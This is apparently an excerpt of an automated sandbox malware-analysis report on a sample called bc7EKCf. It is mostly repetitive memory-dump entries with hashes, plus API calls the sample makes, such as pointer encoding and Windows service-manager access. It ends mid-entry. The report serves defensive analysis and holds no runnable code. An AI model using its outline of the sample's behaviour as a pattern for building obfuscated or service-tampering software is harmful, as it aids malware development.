                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF12DBF2C857498BD710CF65EC4C1A9FBB1B741398BD24A09CA622F2E1E7B4156ACF44
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ed689a4642a8215dcf312625916cdc1fa0adc69d086cd6c3dc25b33ae375dafa
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3fa23b2853e41137eb7671faa329eb41c520f4e0113c76ed4413553285df86e2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed689a4642a8215dcf312625916cdc1fa0adc69d086cd6c3dc25b33ae375dafa
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39A18F36E002098FCF05DFB5C8405AEB7B2FF85344B1585ABEA16AB261DB31E956CF40
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7bc28dbdbb5f9e3ef2a17cbb8daace8ec64a3bc3f6a087d7ecd1c044b1f50ae3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 72875b2263e3c2e5b1430df86ed53926d83058f364905cabba50424c3d773206
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bc28dbdbb5f9e3ef2a17cbb8daace8ec64a3bc3f6a087d7ecd1c044b1f50ae3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4C13DB1C847498BD710CF75EC481A9FBB1FB81394F924A09D6622F2D1EBB8146ACF44
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c6b9bb981123617119305e664ddddaea3dbf19680ce0b417456b15945fa67daf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 384d79317d207546f0193483883db65708cdbedd878b13a0ed4de151a5e410dd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6b9bb981123617119305e664ddddaea3dbf19680ce0b417456b15945fa67daf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4641BB5285EBD12EEB13AB3C59741C63FB04E536A9B0B50D3C4D4CE4B7D588888ED3A6
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862A4C
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862A8B
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862AF2
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL(00000000), ref: 0A862B2E
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862B68
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862BA8
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862BE6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Pointer$Decode$Encode
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1638560559-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 491b27faa483338c061adbccb6cbd3a7c9df2bd61dfa32001b84f395381a1903
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 63e58665e883f49264c0de02374f096291f19a67bfa540e569cb139a6fbe9f7b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 491b27faa483338c061adbccb6cbd3a7c9df2bd61dfa32001b84f395381a1903
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A713EB0C18356CFEB22DFA9C4487DEBFF0AB19309F148899D459A6290D7B85188CF65
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862A4C
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862A8B
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862AF2
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL(00000000), ref: 0A862B2E
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862B68
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862BA8
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862BE6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Pointer$Decode$Encode
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1638560559-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: afd6f94823701f9ee43d6c9abf79498671438051b6e6866615d47b12c538054f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f9f42dc0b925b9118b61f98e9dee91197d3b819b10151683719ac71c597ec676
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afd6f94823701f9ee43d6c9abf79498671438051b6e6866615d47b12c538054f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB6137B0C1435ACFEB21DFA9C4487DEBFF0AB09309F148859D469A6290E7B85588CF65
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A86278F
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL(-000000FC), ref: 0A8627D9
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862819
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A86285F
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A8628A3
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Pointer$Decode$Encode
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1638560559-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7650fe66c2e420e51f42239f589ef756a8de87eff493fbbbe53fbf30993d9e25
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 856c58b2a62ea2303c79f5d3206989d901234b8985933af27620b32e43dc205c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7650fe66c2e420e51f42239f589ef756a8de87eff493fbbbe53fbf30993d9e25
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF512EB0C05319DFEB11DFA8D5887DCBBF1AB48318F288499E859A7291D7B94884CF25
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862AF2
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL(00000000), ref: 0A862B2E
                                                                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0A862B68
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862BA8
                                                                                                                                                                                                                                                                                                                    • RtlDecodePointer.NTDLL ref: 0A862BE6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Pointer$Decode$Encode
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1638560559-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ec71b2e6c6c09555a42bdc9e8acd633394e6ac56ea904953c91dff975f159811
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 740153def35f68377ae829dc1972548e7b99edb8868ed292c85adbd48467ba26
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec71b2e6c6c09555a42bdc9e8acd633394e6ac56ea904953c91dff975f159811
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C74150B1C14356CFEF21DFA9C4483DDBFF0AB08349F148859D459AA290D7B85588CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                                                                                                                                                    • String ID: PH^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 3527080286-2549759414
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 354cd01fc92ecc9bfd9a621cd78507ac7d44444536b663e800038dff96907926
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 52b7335df4ec0c89156e14e18f424df8f27af295be6d3450415f010ece3b3052
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 354cd01fc92ecc9bfd9a621cd78507ac7d44444536b663e800038dff96907926
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC41DD71D082489FEB12CFA8E9897DDBFF4EB15314F24849AE805EB241E7748845CF61

                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                    Execution Coverage:13.4%
                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                    Total number of Nodes:59
                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                                                                    execution_graph 99663 1592368 99664 15923b4 99663->99664 99667 15923e2 99664->99667 99668 1592419 99667->99668 99671 1593918 99668->99671 99669 1592433 99672 1593941 99671->99672 99673 159398e 99672->99673 99675 1593fd8 99672->99675 99673->99669 99676 1594003 99675->99676 99677 159401f 99676->99677 99679 1599fca 99676->99679 99677->99673 99684 1599ff0 99679->99684 99690 159a000 99679->99690 99696 159a700 99679->99696 99680 1599fe9 99680->99677 99688 159a02b 99684->99688 99685 159a16f 99686 159a1a9 99685->99686 99700 1599d94 99685->99700 99686->99680 99688->99685 99688->99686 99703 1599d84 CloseServiceHandle 99688->99703 99694 159a02b 99690->99694 99691 159a1a9 99691->99680 99692 159a16f 99692->99691 99693 1599d94 CloseServiceHandle 99692->99693 99693->99691 99694->99691 99694->99692 99704 1599d84 CloseServiceHandle 99694->99704 99705 159a720 99696->99705 99715 159a730 99696->99715 99697 159a71b 99697->99680 99701 159aa90 CloseServiceHandle 99700->99701 99702 159aaf4 99701->99702 99702->99686 99703->99688 99704->99694 99706 159a73f 99705->99706 99707 159a758 99706->99707 99708 159a764 99706->99708 99725 1599dd0 99707->99725 99710 1599dd0 OpenSCManagerW 99708->99710 99712 159a762 99710->99712 99711 159a772 99711->99697 99712->99711 99713 159a83f OpenSCManagerW 99712->99713 99714 159a870 99713->99714 99714->99697 99717 159a73f 99715->99717 99716 159a758 99719 1599dd0 OpenSCManagerW 99716->99719 99717->99716 99718 159a764 99717->99718 99720 1599dd0 OpenSCManagerW 99718->99720 99722 159a762 99719->99722 99720->99722 99721 159a772 99721->99697 99722->99721 99723 159a83f OpenSCManagerW 99722->99723 99724 159a870 99723->99724 99724->99697 99726 159a7e8 OpenSCManagerW 99725->99726 99728 159a870 99726->99728 99728->99712 99653 76e5270 99654 76e52b6 99653->99654 99660 76e50ec 99654->99660 99657 76e5480 DuplicateHandle 99658 76e5516 99657->99658 99659 76e53be 99661 76e5480 DuplicateHandle 99660->99661 99662 76e53ac 99661->99662 99662->99657 99662->99659
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f069c945f1c1f9c4445413588a9edce47426482cde00b326691707c9e5d299c0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b15d34f2e6283239d7f55b1865ceaac7b295ed4e69cc9373790ed56988437885
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f069c945f1c1f9c4445413588a9edce47426482cde00b326691707c9e5d299c0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C703D935D10A1A8ECB11EFA8C844A99F7B1FF99301F15D7DAE45867221EB70AAC5CF40
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$Hbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4081012451
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 96f2b3671611d20049be6ff015197b2aa49605a88a414924d5fc4c1dea338b19
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60281dd7c296d3e64b57e9bb04d98392dba18a4b3ab0aa3541ec9d14b4655e8f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96f2b3671611d20049be6ff015197b2aa49605a88a414924d5fc4c1dea338b19
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B914671B04A599FDB15DF68C440A6EBBF6EF89314F2485AED005EB391DA30DC46CB90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2003267810.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7640000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: LR^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 31e51d6b3f999f135517ba3646fc5d8fef11fe81cbd3652c4c7400e1deb7b266
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dfc8a27e9cbef4b0cf1c6f1edcd2da81dd0e6450c4056b5826c67ec3c8d212ab
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31e51d6b3f999f135517ba3646fc5d8fef11fe81cbd3652c4c7400e1deb7b266
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38820B70A0025ACFCB24DF68C984B9DBBB2FF49314F1485A5E50AAB365DB34AD85CF50
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (Xcq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1337941515
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f4d901c1fb8f4fdb4068ebbeb3b1f487f0272a138705d46157fe2d3ca293b09c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 35fec9253a113b549bfb3b5ada467716e964fa320dc57ec17787ac8d649a8870
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4d901c1fb8f4fdb4068ebbeb3b1f487f0272a138705d46157fe2d3ca293b09c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0123971B00215DFCB05CFA9D944AAABBFAFFCC300B10856AE409AB365EB359C41DB55
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a351988a78fa72573787d12f56307c4d7088ee20967841b675f8f5186729ff5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c0692a63a00987f828f873b80eb99be163cd3700513f0f8c116f5c47e1f0ddb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a351988a78fa72573787d12f56307c4d7088ee20967841b675f8f5186729ff5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97A124B1E006198FCB14CFA9C8446DEBBF2FF89314F25822AE515BB350DB75A945CB90
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2002641772.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_6fc0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8e90dc2301dcad396ebf347492b8a98ff05755d391edcda4f50d675a995d0951
                                                                                                                                                                                                                                                                                                                    • Instruction ID: cca86782591f7a6d293c2c9f8e3028a6afde3139ad1eb927b0cbe9d8d43ed771
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e90dc2301dcad396ebf347492b8a98ff05755d391edcda4f50d675a995d0951
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C427031A0025ADFCB15CF68D944B9ABBBAFFC8300F10C1A6E409A7364DB359D85DB50
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 546c416eb41d4611ada4db20f95f38b58944462b9ee9647a1f9257c48c5dc4d4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6c27d044ea8f6e1532ebac8c524982062a8b1b1019178053a282a0677320c553
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 546c416eb41d4611ada4db20f95f38b58944462b9ee9647a1f9257c48c5dc4d4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A022AF31A002168FCB15DF78C540AAEB7F2FF85304F6586A9D419BB391DB74AD86CB90
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2002641772.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_6fc0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 899749790df5abff1a94ee46229c3c44f0bf9ed18c5fb060437f6a241626a1ad
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a2c19a72b10fb936a3441b3c40a91544fad04f45f30aa9177bedeb3d56c88a66
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 899749790df5abff1a94ee46229c3c44f0bf9ed18c5fb060437f6a241626a1ad
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16226B31A10259DFCB15CF68D948B9ABBBAFFC8300F10C16AE509A7368DB359D85DB40
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e2b57f27a0a67c122b9e412a5e64efe207de43a1bf540991010e686b65ea977f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a25a6b8e7ad73a3563198c4507338263edcd300af65d02f134ee828ec82fb440
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b57f27a0a67c122b9e412a5e64efe207de43a1bf540991010e686b65ea977f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8025C71A00615DFCB05CFA9D944AAABBFAFFCC300F11816AE409A7365EB75AC41CB50
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2002641772.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_6fc0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 857074fe33a495b2c2a3dd3c263f309bb3f5f31945977de64592346a21209175
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 034a7d56bf14aa5e8ba2c80efde47a7d40bdce7813880f5cec7f577abccdf1ae
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 857074fe33a495b2c2a3dd3c263f309bb3f5f31945977de64592346a21209175
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BF12874A0120ACFDB15DF68C584A9DBBF2FF88310F248169E415AB3A5DB74ED86CB50
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1828941268e3ac035c8ee6226d46e81a6889a63e0656fcc07a65f5519cf32dde
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d23671e9cfcaab84e5d89cbcdf2a0610daf2c9452fe56ff47351a377e78dc34c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1828941268e3ac035c8ee6226d46e81a6889a63e0656fcc07a65f5519cf32dde
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C51B1B1B00214DFCB04DF79D9449BEBBFAEBC8304B148469E809EB355EA359D45CBA1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a293382e96a9ae38ece522d47d08e4ccd979df5929aea0dd9198847b6e1ff2f6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c2a335c118cf203685665beda4cbc71d6def81b0375af714ba741cabd89b9574
